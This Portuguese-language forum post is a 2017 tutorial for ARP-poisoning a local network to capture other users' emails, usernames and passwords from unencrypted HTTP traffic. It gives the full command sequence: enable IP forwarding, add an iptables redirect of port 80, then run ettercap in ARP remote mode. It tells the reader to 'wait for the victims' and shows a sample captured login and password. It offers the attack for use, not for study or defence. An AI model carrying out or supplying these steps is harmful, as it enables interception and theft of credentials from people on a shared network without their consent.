Função: Capturar post datas e outras informações de sua rede local.
Tipos de informações> Emails, senhas, usuários, ip dos hosts.. ETC!
Vamos usar o metodo ARP poisoning (Aonde que todo o tráfego será apontado para você capturando todos dados!)
No caso, eu uso ParrotSec (Linux Debian - Distro Pentesnting) Página do sistema: https://www.parrotsec.org/
Esse metodo pode se aplicar em redes ETH0 e WLAN0 (Cabo ou Wireless)
No caso, esse metodo que vou ensinar está sem o sslstrip, que burla o https, no caso só irá funcionar com http!
(METODO POR TERMINAL)
Comandos:
Code: Select all
$ su
Code: Select all
$ sysctl -w net.ipv4.ip_forward=1
Code: Select all
$ iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 4003
(Este comando, ira mudar a porta do tráfego para 4003 (ou outra que você quiser))-t : Tabela do Firewall;
-p : Protocolo;
--dport : Porta de destino;
-j : (jump) ou simplesmente alvo;
--to-port : Redirecionar para uma porta especifica.
Code: Select all
$ ettercarp -TqM ARP:REMOTE
PRONTO! SÓ AGUARDAR AS VÍTIMAS!
FORMA DE RESULTADO:
2017-10-15 192.168.0.1:8080 USER>[email protected] PASS> Teste123 Data (teste.com):
login=romanosecurity%40teste.com&passwd=Teste123
IRÁ APARECER ALGO PARECIDO!
No próximo irei ensinar por Ettercap GUI (Interface gráfica)
, RomanoSecurity 2017